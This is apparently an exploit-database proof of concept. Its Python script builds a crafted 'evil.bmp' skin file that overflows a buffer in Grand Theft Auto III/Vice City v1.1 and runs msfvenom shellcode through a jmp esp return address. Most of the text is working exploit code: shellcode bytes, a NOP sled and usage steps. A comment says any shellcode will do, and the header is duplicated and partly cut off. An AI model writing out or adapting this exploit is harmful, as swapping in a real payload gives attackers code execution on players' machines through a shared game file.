# Exploit Title: Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow
# Exploit Date: 22.01.2023
# Discovered and Written by: Knursoft
# Vendor Homepage: https://www.rocksta # Exploit Title: Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow
# Exploit Date: 22.01.2023
# Discovered and Written by: Knursoft
# Vendor Homepage: https://www.rockstargames.com/
# Version: v1.1
# Tested on: Windows XP SP2/SP3, 7, 10 21H2
# CVE : N/A

#1 - Run this python script to generate "evil.bmp" file.
#2 - Copy it to [Your Game Path]skins.
#3 - Launch the game and navigate to Options > Player Setup and choose skin
"evil".
#4 - Buffer Overflow occurs and calc.exe pops up!

#msfvenom -p windows/exec CMD="calc.exe"
buf = b""
buf += b"xfcxe8x82x00x00x00x60x89xe5x31xc0x64"
buf += b"x8bx50x30x8bx52x0cx8bx52x14x8bx72x28"
buf += b"x0fxb7x4ax26x31xffxacx3cx61x7cx02x2c"
buf += b"x20xc1xcfx0dx01xc7xe2xf2x52x57x8bx52"
buf += b"x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1"
buf += b"x51x8bx59x20x01xd3x8bx49x18xe3x3ax49"
buf += b"x8bx34x8bx01xd6x31xffxacxc1xcfx0dx01"
buf += b"xc7x38xe0x75xf6x03x7dxf8x3bx7dx24x75"
buf += b"xe4x58x8bx58x24x01xd3x66x8bx0cx4bx8b"
buf += b"x58x1cx01xd3x8bx04x8bx01xd0x89x44x24"
buf += b"x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5a"
buf += b"x8bx12xebx8dx5dx6ax01x8dx85xb2x00x00"
buf += b"x00x50x68x31x8bx6fx87xffxd5xbbxf0xb5"
buf += b"xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7c"
buf += b"x0ax80xfbxe0x75x05xbbx47x13x72x6fx6a"
buf += b"x00x53xffxd5x63x61x6cx63x2ex65x78x65"
buf += b"x00"
#any shellcode should work, as it seems there is no badchars

ver = 0 #set to 1 if you want it to work on GTA III steam version

esp = b"xb9xc5x14x21" #mss32.dll jmp esp
bmphdr =
b"x42x4Dx36x00x03x00x00x00x00x00x36x00x00x00x28x00"
#generic bmp header

payload = bmphdr
payload += b"x90" * 1026
if ver == 1:
payload += b"x90" * 112
payload += esp
payload += b"x90" * 20 #padding
payload += buf

with open("evil.bmp", "wb") as poc:
poc.write(payload)